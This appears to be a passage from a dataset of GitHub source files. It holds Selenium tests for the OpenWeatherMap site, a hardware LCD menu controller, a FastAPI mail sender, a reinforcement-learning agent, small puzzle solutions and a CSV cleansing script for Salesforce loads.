'2012 — 2023', 'OpenWeather', '® All rights reserved']\nmap_info_block = (\"css selector\", 'a.map-info-block .minutely-section')\nURL = 'https://openweathermap.org/'\n#The page 'Maps' (/weathermap) doesn't include because it hasn't website footer\nPAGES = ['', 'guide', 'api', 'weather-dashboard', 'price', 'our-initiatives', 'examples', 'home/sign_in', 'faq', 'appid']\n\n\ndef test_TC_003_07_01_visibility_of_the_company_module(driver, open_and_load_main_page, wait):\n footer_website = driver.find_element(*footer_website_locator)\n driver.execute_script(\"arguments[0].scrollIntoView();\", footer_website)\n company_title = driver.find_element(*company_title_locator)\n assert company_title.is_displayed()\n content = driver.find_element(*company_content_locator)\n assert content.is_displayed()\n\n\ndef test_TC_003_10_03_visibility_of_GitHub_icon(driver, open_and_load_main_page, wait):\n footer_website = driver.find_element(*footer_website_locator)\n driver.execute_script(\"arguments[0].scrollIntoView();\", footer_website)\n github_icon = driver.find_element(*gitHub_icon_image)\n assert github_icon.is_displayed()\n\n\ndef test_TC_002_01_02_verify_returning_from_API_page_to_main_page_by_clicking_on_logo(driver, wait):\n driver.get('https://openweathermap.org/api')\n driver.find_element(*logo).click()\n assert 'https://openweathermap.org/' in driver.current_url\n\n\n@pytest.mark.parametrize('page', PAGES)\ndef test_TC_003_01_01_verify_footer_is_visible_from_all_pages_specified_in_data(driver, wait, page):\n driver.get(f'{URL}{page}')\n footer_website = driver.find_element(*footer_website_locator)\n driver.execute_script('arguments[0].scrollIntoView();', footer_website)\n # print(footer_website.is_displayed(), driver.current_url, driver.title)\n assert footer_website.is_displayed() and driver.title not in 'Page not found (404) - OpenWeatherMap', \\\n f'\\nFooter is not present on the page - {driver.current_url}'\n\n\n@pytest.mark.parametrize('page', PAGES)\ndef test_TC_003_01_02_verify_copyright_is_visible_from_all_pages_specified_in_data(driver, wait, page):\n driver.get(f'{URL}{page}')\n copyright_website = driver.find_element(*copyright_locator)\n driver.execute_script('arguments[0].scrollIntoView();', copyright_website)\n copyright_actual_result = copyright_website.text\n copyright_flag = 1\n for i in copyright_expected_result:\n if i not in copyright_actual_result:\n copyright_flag = 0\n assert copyright_website.is_displayed() and copyright_flag == 1, f'\\nCopyright is not present (actual) on the page - {driver.current_url}'\n\ndef test_TC_003_10_05_verify_visibility_of_github_icon(driver, open_and_load_main_page):\n github_icon = driver.find_element(*gitHub_icon_image)\n assert github_icon.is_displayed() and github_icon.is_enabled()\n\ndef test_TC_001_06_01_redirect_to_interactive_world_weather_map(driver, open_and_load_main_page, wait):\n driver.find_element(*map_info_block).click()\n driver.switch_to.window(driver.window_handles[1])\n wait.until(EC.title_is(\"Interactive weather maps - OpenWeatherMap\"))\n assert driver.title == \"Interactive weather maps - OpenWeatherMap\"\n\n\n\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nURL = \"https://openweathermap.org/\"\n\n\ndef test_check_page_title(driver):\n # function checks page title\n driver.get('https://openweathermap.org')\n assert driver.title == 'Сurrent weather and forecast - 
OpenWeatherMap'\n\n\ndef test_should_open_given_link(driver):\n driver.get(URL)\n assert 'openweathermap' in driver.current_url\n\n\ndef test_button_search_exist(driver):\n driver.get(URL)\n btn = driver.find_element(By.XPATH, \"//button[@type='submit']\")\n assert btn.text == \"Search\"\n\n\ndef test_open_page_map(driver):\n driver.get('https://openweathermap.org/weathermap?basemap=map&cities=true&layer=temperature&lat=30&lon=-20&zoom=5')\n driver.maximize_window()\n assert \"weathermap\" in driver.current_url","repo_name":"AleksandrMax88/OpenWeatherPython","sub_path":"tests/test_group_roma.py","file_name":"test_group_roma.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12267436510","text":"POLL_TIME = 0.01\nHOLD_TIME = 1.0\nLONG_TIME = 3.0\nMENU_TIMEOUT = 5.0\nBLINK_TIME = 0.1\nSCROLL_TIME = 0.4\n\n\nimport time\nimport ssd1306\nimport OPi.GPIO as GPIO\nfrom encoder import Encoder\nfrom .hw_overlay import *\n\nif ACTIVE_HIGH:\n ACTIVE = GPIO.HIGH\nelse:\n ACTIVE = GPIO.LOW\nSTATE_NONE = 0\nSTATE_DOWN = 1\nSTATE_TAP = 2\nSTATE_HOLD = 3\nSTATE_HELD = 4\nSTATE_LONG = 5\nSTATE_LONGER = 6\n\nCHR_BSP = 0\nCHR_ENT = 1\nINPCHARS = \" abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.\\/\" + chr(CHR_BSP) + chr(CHR_ENT)\nPRNCHARS = ' !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~' + chr(CHR_BSP) + chr(CHR_ENT)\n\nclass StompBox():\n\n def enc_left(scale_position):\n print('Encoder turned left')\n\n def enc_right(scale_position):\n print('Encoder turned right')\n\n def enc_btn(scale_position):\n print('Encoder button pressed')\n\n def __init__(self):\n\n # initialize LCD\n self.LCD = RPLCD.CharLCD(pin_rs=LCD_RS,\n pin_e=LCD_EN,\n pin_rw=None,\n pins_data=[LCD_D4, LCD_D5, LCD_D6, LCD_D7],\n numbering_mode=GPIO.BCM,\n cols=16, rows=2,\n compat_mode=True)\n self.LCD.create_char(CHR_BSP,[0,3,5,9,5,3,0,0])\n self.LCD.create_char(CHR_ENT,[0,1,5,9,31,8,4,0])\n self.lcd_clear()\n self.encoder = Encoder(CLK=1, DT=2, SW=3)\n self.encoder.setup(dec_callback=self.enc_left, inc_callback=self.enc_right, sw_callback=self.enc_btn)\n\n def lcd_clear(self):\n self.LCD.clear()\n self.scrollmsg = ''\n \n def lcd_write(self, text, row=0, col=0):\n if len(text) > 16:\n if self.scrollmsg:\n self.LCD.cursor_pos = (row, 0)\n if self.scrollpos < 0:\n self.LCD.write_string(\"%-16s\" % self.scrollmsg[:16])\n elif self.scrollpos < (len(self.scrollmsg) - 16):\n self.LCD.write_string(\"%-16s\" % self.scrollmsg[self.scrollpos:self.scrollpos+16]) \n elif self.scrollpos < (len(self.scrollmsg) - 14):\n self.LCD.write_string(\"%-16s\" % self.scrollmsg[-16:])\n else:\n self.scrollpos = -4 \n else:\n self.scrollmsg = text\n self.scrollrow = row\n self.scrollpos = -4\n self.lastscroll = time.time()\n self.LCD.cursor_pos = (row, 0)\n self.LCD.write_string(\"%-16s\" % text[:16])\n else:\n if self.scrollmsg and row == self.scrollrow:\n self.scrollmsg = ''\n self.LCD.cursor_pos = (row, col)\n self.LCD.write_string(text)\n \n \n def lcd_blink(self, text, row=0, n=3):\n while n != 0:\n self.lcd_write(' '*16, row)\n time.sleep(BLINK_TIME)\n self.lcd_write(\"%-16s\" % text, row)\n time.sleep(BLINK_TIME)\n n -= 1\n \n def choose_opt(self, opts, row=0, timeout=MENU_TIMEOUT, passlong=False):\n \"\"\"\n has the user choose from a list of choices in :opts\n returns the index of the choice\n or -1 if the user backed out or time expired\n passlong: pass STATE_LONG through to 
calling loop\n \"\"\"\n i=0\n while True:\n self.lcd_write(' '*16, row)\n self.lcd_write(opts[i], row)\n tstop = time.time() + timeout\n while True:\n if timeout and time.time() > tstop:\n self.lcd_write(' '*16, row)\n return -1\n self.update()\n if sum(self.state.values()) == STATE_NONE:\n continue\n elif self.state[BTN_R] == STATE_TAP:\n i=(i+1)%len(opts)\n break\n elif self.state[BTN_L] == STATE_TAP:\n i=(i-1)%len(opts)\n break\n elif self.state[BTN_R] == STATE_HOLD:\n self.lcd_blink(opts[i], row)\n return i\n elif self.state[BTN_L] == STATE_HOLD:\n self.lcd_write(' '*16, row)\n return -1\n elif STATE_LONG in self.state.values() and passlong:\n for b in self.state:\n if self.state[b] == STATE_LONG:\n self.state[b] = STATE_HELD\n return -1\n\n def choose_val(self, val, inc, minval, maxval, format=\"%16s\"):\n \"\"\"\n lets the user change a numeric parameter\n returns the user's choice on timeout\n \"\"\"\n while True:\n self.lcd_write('%16s' % (format % val), 1)\n tstop = time.time() + MENU_TIMEOUT\n while time.time() < tstop:\n self.update()\n if sum(self.state.values()) == STATE_NONE:\n continue\n if self.state[BTN_R] > STATE_DOWN:\n val = min(val + inc, maxval)\n elif self.state[BTN_L] > STATE_DOWN:\n val = max(val - inc, minval)\n break\n else:\n return val\n\n def char_input(self, text='', row=1, timeout=MENU_TIMEOUT, charset=INPCHARS):\n \"\"\"\n a way of letting the user enter a text string with two buttons\n text: the initial value of the text\n user taps buttons to choose character, holds buttons to move\n cursor right or left\n when cursor is at end of input, user can tap to\n delete or newline character\n newline returns text\n timeout returns empty string\n \"\"\"\n i = len(text)\n char = len(charset) - 1\n self.LCD.cursor_mode = 'blink'\n while True:\n if i < len(text):\n char = charset.find(text[i])\n lpos = max(i - 15, 0)\n self.lcd_write(\"%-16s\" % text[lpos:lpos + 16], row)\n if char > -1:\n self.lcd_write(charset[char], row, min(i, 15))\n self.LCD.cursor_pos = (row, min(i, 15))\n tstop = time.time() + timeout\n while time.time() < tstop:\n self.update()\n if sum(self.state.values()) == STATE_NONE:\n continue\n elif STATE_TAP in self.state.values():\n if i==len(text):\n if self.state[BTN_R] == STATE_TAP:\n char = (char + 1) % len(charset)\n else:\n char = (char - 1) % len(charset)\n else:\n if self.state[BTN_R] == STATE_TAP:\n char = (char + 1) % (len(charset) - 2)\n else:\n char = (char - 1) % (len(charset) - 2)\n if char < (len(charset) - 2):\n text = text[0:i] + charset[char] + text[i+1:]\n break\n elif self.state[BTN_R] >= STATE_HOLD:\n if self.state[BTN_R] == STATE_HELD: continue\n if char == (len(charset) - 1):\n if self.state[BTN_R] != STATE_HOLD: continue\n self.LCD.cursor_mode = 'hide'\n self.lcd_blink(text.strip()[0:16], row)\n return text.strip()\n if self.state[BTN_R] > STATE_HELD: time.sleep(BLINK_TIME)\n i = min(i + 1, len(text))\n if i == len(text):\n char = len(charset) - 1\n break\n elif self.state[BTN_L] >= STATE_HOLD:\n if self.state[BTN_L] == STATE_HELD: continue\n if char == (len(charset) - 2):\n text = text[0:max(0, i - 1)] + text[i:]\n if self.state[BTN_L] > STATE_HELD: time.sleep(BLINK_TIME)\n i = max(i - 1, 0)\n break\n else:\n self.LCD.cursor_mode = 'hide'\n return ''\n\n","repo_name":"laurence-diack/fluidpatcher","sub_path":"utils/stompboxopi.py","file_name":"stompboxopi.py","file_ext":"py","file_size_in_byte":8242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"30862424811","text":"from 
fastapi import BackgroundTasks, FastAPI\nfrom starlette.responses import JSONResponse\nfrom fastapi_mail import FastMail, MessageSchema, ConnectionConfig, MessageType\nfrom pydantic import EmailStr, BaseModel\nfrom typing import Any, List, Dict\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass EmailSchema(BaseModel):\n email: List[EmailStr]\n body: Dict[str, Any]\n\n\nconf = ConnectionConfig(\n MAIL_USERNAME = os.environ.get('MAIL_USERNAME'),\n MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD'),\n MAIL_FROM = os.environ.get('MAIL_FROM'),\n MAIL_PORT = 587,\n MAIL_SERVER = os.environ.get('MAIL_SERVER'),\n MAIL_FROM_NAME=\"Медведь Сергеевич\",\n MAIL_STARTTLS = True,\n MAIL_SSL_TLS = False,\n USE_CREDENTIALS = True,\n VALIDATE_CERTS = True,\n TEMPLATE_FOLDER = './frontend/templates',\n)\n\n\nasync def send_in_background(\n email: Dict[str, Any]\n ) -> JSONResponse:\n html = \"\"\"
    Hi this test mail, thanks for using Fastapi-mail
    \"\"\"\n message = MessageSchema(\n subject=\"Fastapi-Mail module\",\n recipients=email.get(\"email\"),\n template_body=email.get(\"body\"),\n subtype=MessageType.html,\n )\n print(message.template_body)\n fm = FastMail(conf)\n\n await fm.send_message(message, template_name='email.html')\n\n return JSONResponse(status_code=200, content={\"message\": \"email has been sent\"})","repo_name":"mokybrow/mokybrowsite","sub_path":"api/email/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15229653899","text":"class Solution:\n def diagonalSum(self, mat: List[List[int]]) -> int:\n \n order = len(mat[0])\n diagonalSum = 0\n \n if order == 1:\n return mat[0][0]\n \n for i in range(order):\n \n diagonalSum += mat[i][i] + mat[i][order - i - 1]\n \n if order % 2 == 1:\n \n diagonalSum -= mat[order // 2][order//2]\n \n \n return diagonalSum\n ","repo_name":"lsbiff/leetcode","sub_path":"1572. Matrix Diagonal Sum.py","file_name":"1572. Matrix Diagonal Sum.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38374758070","text":"import sys\nimport random\n\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom model import QNetwork\nfrom marl_utils import hard_update, soft_update, onehot_from_logits\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nFloatTensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor\n\n\nclass Agent:\n \"\"\"\n Class for individual IQL agent\n \"\"\"\n\n def __init__(self, observation_size, action_size, params):\n \"\"\"\n Initialise parameters for agent\n :param observation_size: dimensions of observations\n :param action_size: dimensions of actions\n :param params: parsed arglist parameter list\n \"\"\"\n self.observation_size = observation_size\n self.action_size = action_size\n self.params = params\n\n self.epsilon = params.epsilon\n self.epsilon_anneal_slow = params.epsilon_anneal_slow\n if self.epsilon_anneal_slow:\n self.goal_epsilon = params.goal_epsilon\n self.epsilon_decay = params.epsilon_decay\n self.decay_factor = params.decay_factor\n self.current_decay = params.decay_factor\n else:\n self.decay_factor = params.decay_factor\n\n # create Q-Learning networks\n self.model = QNetwork(observation_size, action_size, params.hidden_dim)\n\n if params.seed is not None:\n random.seed(params.seed)\n np.random.seed(params.seed)\n torch.manual_seed(params.seed)\n torch.cuda.manual_seed(params.seed)\n if torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n self.target_model = QNetwork(\n observation_size, action_size, params.hidden_dim\n )\n\n if params.seed is not None:\n random.seed(params.seed)\n np.random.seed(params.seed)\n torch.manual_seed(params.seed)\n torch.cuda.manual_seed(params.seed)\n if torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n hard_update(self.target_model, self.model)\n\n # create optimizer\n self.optimizer = optim.Adam(self.model.parameters(), lr=params.lr)\n\n if params.seed is not None:\n random.seed(params.seed)\n np.random.seed(params.seed)\n torch.manual_seed(params.seed)\n torch.cuda.manual_seed(params.seed)\n if torch.cuda.is_available():\n 
torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n self.t_step = 0\n\n def step(self, obs, explore=False, available_actions=None):\n \"\"\"\n Take a step forward in environment for a minibatch of observations\n :param obs (PyTorch Variable): Observations for this agent\n :param explore (boolean): Whether or not to add exploration noise\n :param available_actions: binary vector (n_agents, n_actions) where each list contains\n binary values indicating whether action is applicable\n :return: action (PyTorch Variable) Actions for this agent\n \"\"\"\n qvals = self.model(obs)\n self.t_step += 1\n\n if available_actions is not None:\n assert self.discrete_actions\n available_mask = torch.ByteTensor(list(map(lambda a: a == 1, available_actions)))\n negative_tensor = torch.ones(qvals.shape) * -1e9\n negative_tensor[:, available_mask] = qvals[:, available_mask]\n qvals = negative_tensor\n if explore:\n action = onehot_from_logits(qvals, self.epsilon)\n else:\n # use small epsilon in evaluation even\n action = onehot_from_logits(qvals, 0.01)\n\n if self.epsilon_anneal_slow:\n self.current_decay *= self.decay_factor\n self.epsilon = max(0.1 + (self.epsilon_decay - self.current_decay)/ self.epsilon_decay, self.goal_epsilon)\n else:\n self.epsilon *= self.decay_factor\n\n return action\n","repo_name":"semitable/seac","sub_path":"seql/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"25279332411","text":"from typing import List, Optional\n\nfrom fastapi import HTTPException\n\nfrom database import get_list, insert_and_get_id, make_query, make_delete_query\nfrom models import tables\n\n\nclass WishListService:\n\n def get(self, user_id: int, product_id: int) -> Optional[tables.WishList]:\n return make_query(\"SELECT * FROM wish_list WHERE user_id=%s \"\n \"AND product_id=%s LIMIT 1\", tables.WishList, (user_id, product_id,))\n\n def get_list(self, user_id: int) -> List[tables.Product]:\n return get_list(\"SELECT * FROM products\"\n \" INNER JOIN wish_list w on products.id = w.product_id\"\n \" WHERE w.user_id = %s\", tables.Product, user_id)\n\n def add(self, user_id: int, product_id: int) -> int:\n if self.get(user_id, product_id):\n raise HTTPException(status_code=418, detail=\"This product has already been added\")\n query = \"INSERT INTO wish_list (user_id, product_id) \" \\\n \"VALUES (%s, %s)\"\n return insert_and_get_id(query, (user_id, product_id))\n\n def delete(self, user_id: int, product_id: int) -> tables.WishList:\n make_delete_query(\"DELETE FROM wish_list WHERE user_id=%s AND product_id=%s\",\n (user_id, product_id,))\n return tables.WishList(user_id=user_id, product_id=product_id)\n","repo_name":"polinkasosiska/jewelry_store","sub_path":"Python(create_db)/services/wish_list.py","file_name":"wish_list.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3163306425","text":"def main():\r\n file1 = open('input.txt', 'r')\r\n numbers = dict()\r\n lst = []\r\n while True: \r\n line = file1.readline() \r\n if not line: \r\n break\r\n numbers[int(line)] = int(line)\r\n lst.append(int(line))\r\n\r\n for e in lst:\r\n if (2020 - e) in numbers:\r\n result = e * (2020 - e)\r\n print(result)\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n 
main()","repo_name":"florinrm/aoc-2020","sub_path":"day1/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12773842525","text":"#!/usr/bin/env python3\r\n\r\n# Author: krishna.r.shetty@outlook.com\r\n# Version: 2.0\r\n# 08-Oct-2018.\r\n\r\nimport pandas as pd\r\nimport random as rd\r\nimport os\r\nimport write_log as log\r\nimport datetime\r\nfrom csv import QUOTE_ALL # package to add quote for all fields in the final files.\r\nimport numpy as np # for column 7, replacing if length > 9950 and add custom text\r\n\r\n\r\n# CONFIGURATION\r\n# File containing all the pre identified HTML tags that needs to be removed before SF loading.\r\ntag_param_for_removal = r\"C:\\Users\\krishna.shetty\\PycharmProjects\\SFBLoad\\config\\parameters.txt\"\r\n\r\n# Directory that contains all source CSV files that needs to be cleansed.\r\ninput_dir = r\"C:\\sfb_load\\input\\\\\"\r\nsf_suc_file_feed_item = r\"C:\\sfb_load\\input\\sf\\sfFeedItemSuccess.csv\" #directory containing post processed SF file.\r\nsf_item_file = r\"C:\\sfb_load\\input\\sf\\FeedItem.csv\"\r\nsf_comment_file = r\"C:\\sfb_load\\input\\sf\\FeedComment.csv\"\r\n\r\n#File header (post split)\r\nitem_header = ['messageid','parentmessageid','threadid','containertype','containerid','userid','subject','body',\r\n 'rewardpoints','creationdate','modificationdate','status','isRichText','Type']\r\n\r\ncomment_header = ['messageid','parentmessageid','threadid','containertype','containerid','userid','subject',\r\n 'body','rewardpoints','creationdate','modificationdate','status','isRichText']\r\n\r\n\r\n# Directory where the cleansed, transformed files will be generated.\r\noutput_dir = r\"C:\\sfb_load\\output\\\\\" # Folder location where the split file will be stored. 
2 files in total\r\n\r\n# Directory path for Log files\r\nlog_path = r\"C:\\sfb_load\\log\\\\\"\r\nlog_file = log_path + \"sfb_file_transform.\"\r\nlog_file_name = str(log_file + datetime.datetime.now().strftime('%d-%m-%y') + \".log\")\r\n\r\n# Custom file changes\r\ncustom_text = 'The original post was too long, and is attached as a text file'\r\n\r\n\r\ndef to_csv(DataFrame, FileName, Mode = 'a', header = None):\r\n '''\r\n :param DataFrame: Name of the active pandas dataframe.\r\n :param FileName: target file name to which the dataframe will be written.\r\n :param Mode: default mode - Append (a), unless specified as \"write\" (w).\r\n :return: None.\r\n '''\r\n DataFrame.to_csv(path_or_buf=FileName, sep=',',\r\n na_rep='', float_format=None, columns=None, header=header, index=False,\r\n index_label=None, mode=Mode, encoding=None, compression=None, quoting=QUOTE_ALL,\r\n quotechar='\"', line_terminator='\\n', chunksize=None, tupleize_cols=None,\r\n date_format=None, doublequote=True, escapechar=None, decimal='.')\r\n print('file created : ' + FileName)\r\n\r\ndef add_header(file_name, ftype):\r\n\r\n if ftype == 'c':\r\n df_tmp = pd.read_csv(file_name, header=None)\r\n os.remove(file_name)\r\n to_csv(DataFrame=df_tmp, FileName=file_name, Mode='w', header=comment_header)\r\n elif ftype == 'i':\r\n df_tmp = pd.read_csv(file_name, header=None)\r\n to_csv(DataFrame=df_tmp, FileName=file_name, Mode='w', header=item_header)\r\n else:\r\n pass\r\n\r\n\r\ndef check_directory():\r\n '''\r\n Checks and validates if the key working directories are present.\r\n directories being validated = log and input directory.\r\n :return:None\r\n '''\r\n if os.path.isdir(log_path):\r\n pass\r\n else:\r\n os.mkdir(log_path)\r\n log.log_me(log_file_name,\"Directory \" + log_path + \" created.\")\r\n\r\n if os.path.isdir(input_dir):\r\n pass\r\n else:\r\n os.mkdir(input_dir)\r\n log.log_me(log_file_name,\"Directory \" + input_dir + \" created. However no csv files to process\")\r\n log.log_me(log_file_name, \"Terminating program..\")\r\n exit(1)\r\n\r\n if os.path.isdir(output_dir):\r\n pass\r\n else:\r\n os.mkdir(output_dir)\r\n log.log_me(log_file_name,\"Directory \" + output_dir + \" created.\")\r\n\r\n print(\"Directory check : OK\")\r\n\r\ndef modify_feed(feed_file):\r\n os.chdir(output_dir)\r\n df = pd.read_csv(feed_file)\r\n df[13] = r'QuestionPost'\r\n\r\n to_csv(df, feed_file, 'w')\r\n print(\"file modified \"+ feed_file)\r\n\r\n\r\ndef split_file(input_file, suffix):\r\n \"\"\"\r\n Processes the input CSV file and creates the FEED and COMMENTS split.\r\n :param input_file: Name of the CSV file to be split into Feed and Comments data.\r\n :param suffix: technical parameter appended to the end of the split file.
avoids overwriting.\r\n :return: None.\r\n \"\"\"\r\n print(\"Processing file : \" + input_file)\r\n file_feed = output_dir + \"FeedItem_\"\r\n file_comment = output_dir + \"FeedComment_\"\r\n\r\n try:\r\n ''' Read the input CSV file'''\r\n data = pd.read_csv(input_file, header=None, index_col=None)\r\n tot_count = str(data[0].count())\r\n\r\n #Text manipulation if length > 9950\r\n data[7] = np.where(data[7].str.len() > 9950, data[7].str.slice(0, 1000), data[7])\r\n\r\n #Date conversion\r\n data[9] = pd.to_datetime(data[9], unit='ms')\r\n data[10] = pd.to_datetime(data[10], unit='ms')\r\n data[12] = r'TRUE'\r\n\r\n #Cleanse data remove tags\r\n tags = open(tag_param_for_removal, 'r')\r\n for tag in tags:\r\n if tag[0] == '#':\r\n pass\r\n else:\r\n data = data.replace(tag.strip(), '', regex=True)\r\n tags.close()\r\n log.log_me(log_file_name, \"Tags configured in file : \" + tag_param_for_removal + \" removed.\")\r\n log.log_me(log_file_name, \"cleansing complete..\")\r\n\r\n\r\n # Splitting dataframe\r\n # Condition \"2nd field = null\" (Question)\r\n dataframe_feed = data[data[1].isnull()]\r\n dataframe_comment = data[data[1].notnull()]\r\n\r\n file_feed = file_feed + str(suffix) + \".csv\"\r\n file_comment = file_comment + str(suffix) + \".csv\"\r\n\r\n # Write back transformed file to \"csv\" format.\r\n # All parameters except \"quoting\" changed to \"QUOTE_ALL\" to match with the input quoting style.\r\n to_csv(dataframe_feed, file_feed, 'w')\r\n to_csv(dataframe_comment, file_comment, 'w')\r\n\r\n # Gather total number of lines for each of the files after split\r\n # purpose: logging.\r\n feed_count = str(dataframe_feed[0].count())\r\n comment_count = str(dataframe_comment[0].count())\r\n\r\n #Post split modifications\r\n modify_feed(file_feed)\r\n\r\n #add header\r\n add_header(file_feed, 'i')\r\n add_header(file_comment, 'c')\r\n\r\n # Logging\r\n log.log_me(log_file_name, \"Input File :\" + input_file + ' | Total record count :' + tot_count)\r\n log.log_me(log_file_name, \"File \" + file_feed + ' created | Total feed count :' + feed_count)\r\n log.log_me(log_file_name, \"File \" + file_comment + ' created | Total feed count :' + comment_count)\r\n log.log_me(log_file_name, \"----------------------------------\")\r\n print(\"File \"+ input_file +\" processed\")\r\n\r\n except Exception as e:\r\n log.log_me(log_file_name, \"Exception encountered\")\r\n log.log_me(log_file_name, e)\r\n exit(1)\r\n\r\n\r\ndef scan_files():\r\n \"\"\"\r\n Scan thought ALL files in input_directory,\r\n pick the \"csv\" files for processing (splitting).\r\n :return: Total number of files successfully processed.\r\n \"\"\"\r\n try:\r\n print(\"Initializing file processing\")\r\n counter = 0\r\n log.log_me(log_file_name, \"=================================\")\r\n log.log_me(log_file_name, \"Input Directory :\" + input_dir)\r\n log.log_me(log_file_name, \"Output Directory :\" +output_dir)\r\n log.log_me(log_file_name, \"=================================\")\r\n for file in os.listdir(input_dir):\r\n\r\n # Generate random 4 digit suffix to append to the split file name\r\n # Purpose: Avoid overwriting.\r\n suffix = rd.randint(1111, 9999)\r\n fin_inp_path = input_dir + file\r\n\r\n if file[-3:] == \"csv\":\r\n log.log_me(log_file_name, \"Processing file : \" + fin_inp_path)\r\n split_file(fin_inp_path, suffix)\r\n counter += 1\r\n else:\r\n continue\r\n return counter\r\n except Exception as e:\r\n log.log_me(log_file_name, \"Exception encountered\")\r\n log.log_me(log_file_name, e)\r\n 
exit(1)\r\n\r\n\r\ndef MergeAll():\r\n '''\r\n execute as follows:\r\n sfb_load.MergeAll()\r\n :return:\r\n '''\r\n os.chdir(output_dir)\r\n feed_master_file = 'feed_master_'\r\n comment_master_file = 'comment_master_'\r\n\r\n #suffix = rd.randint(1111, 9999)\r\n #suffix = '123'\r\n\r\n #fm_final = feed_master_file + str(suffix) + '.csv'\r\n #cm_final = comment_master_file + str(suffix) + '.csv'\r\n\r\n fm_final = feed_master_file + '.csv'\r\n cm_final = comment_master_file + '.csv'\r\n\r\n print(fm_final)\r\n print(cm_final)\r\n\r\n for file in os.listdir(output_dir):\r\n if file[:7] == \"FeedIte\":\r\n print('processing file : ' + file)\r\n tmp_df = pd.read_csv(file, header=None)\r\n to_csv(tmp_df, fm_final, 'a')\r\n\r\n elif file[:7] == \"FeedCom\":\r\n print('processing file : ' + file)\r\n tmp_df_cm = pd.read_csv(file, header=None)\r\n to_csv(tmp_df_cm, cm_final, 'a')\r\n else:\r\n pass\r\n\r\n\r\ndef post_load_transformation():\r\n ''' Perform post split file modification '''\r\n # read sf input csv file'''\r\n # header_modification\r\n comment_header = ['messageid', 'parentmessageid', 'threadid', 'containertype', 'containerid', 'userid', 'subject',\r\n 'body', 'rewardpoints', 'creationdate', 'modificationdate', 'status',\r\n 'isRichText','id', 'ParentThreadL0']\r\n\r\n\r\n df_sf = pd.read_csv(sf_suc_file_feed_item, encoding = \"ISO-8859-1\")\r\n df_comm = pd.read_csv(sf_comment_file, encoding = \"ISO-8859-1\")\r\n\r\n df_comm = pd.merge(df_comm, df_sf[['threadid', 'id', 'messageid']], on='threadid', how='left')\r\n to_csv(df_comm, sf_comment_file, 'w', comment_header)\r\n #df_comm.to_csv(sf_comment_file, sep=',', na_rep='', float_format=None, header=True, mode='w', index=False, index_label=None)\r\n\r\n\r\nif __name__ == '__main__':\r\n # Validate if the configured directories exist.\r\n check_directory()\r\n\r\n # Call function to scan all files (csv's) within input directory\r\n #no_of_files_processed = scan_files()\r\n #print(\"Number of files processed :\" + str(no_of_files_processed))\r\n\r\n #Merging splited files into one single file for feed and comments.\r\n #Merge_feedandcomment()\r\n\r\n #Perform post SF load transformation\r\n post_load_transformation()\r\n print('Post load transformation completed..')\r\n\r\n\r\n print(\"Processing complete..\")\r\n print(\"See log for details : \" + log_file_name)","repo_name":"KshParis/DataCleanser_CSV_SF_load","sub_path":"sfb_load.py","file_name":"sfb_load.py","file_ext":"py","file_size_in_byte":10717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17663657359","text":"# Part 3.1 (Division function)\n\ndiv_func = lambda num1, num2: num1 / num2\n\na = int(input('Делимое: '))\nb = int(input('Делитель: '))\nwhile b == 0:\n print(\"Деление на ноль! 
Решение невозможно.\")\n break\nelse:\n print(div_func(a, b))\n\n","repo_name":"ImranYagizarov/GB_GitHub","sub_path":"Task 3.1.py","file_name":"Task 3.1.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24601837084","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\nFile containing classes used to implement a Bayesian Neural Network Layer.\n GaussianDistribution - Trainable Distribution used for the posterior of a Bayesian layer.\n ScaleMixtureGaussian - Distribution used for the prior of a Bayesian layer.\n BayesianLinearLayer - Bayesian Fully Connected Layer.\n\"\"\"\n\n\n# Built-in/Generic Imports\nimport math\n\n# Library Imports\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\n__author__ = [\"Jacob Carse\", \"Andres Alvarez Olmo\"]\n__copyright__ = \"Copyright 2022, Calibration\"\n__credits__ = [\"Jacob Carse\", \"Andres Alvarez Olmo\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer = [\"Jacob Carse\", \"Andres Alvarez Olmo\"]\n__email__ = [\"j.carse@dundee.ac.uk\", 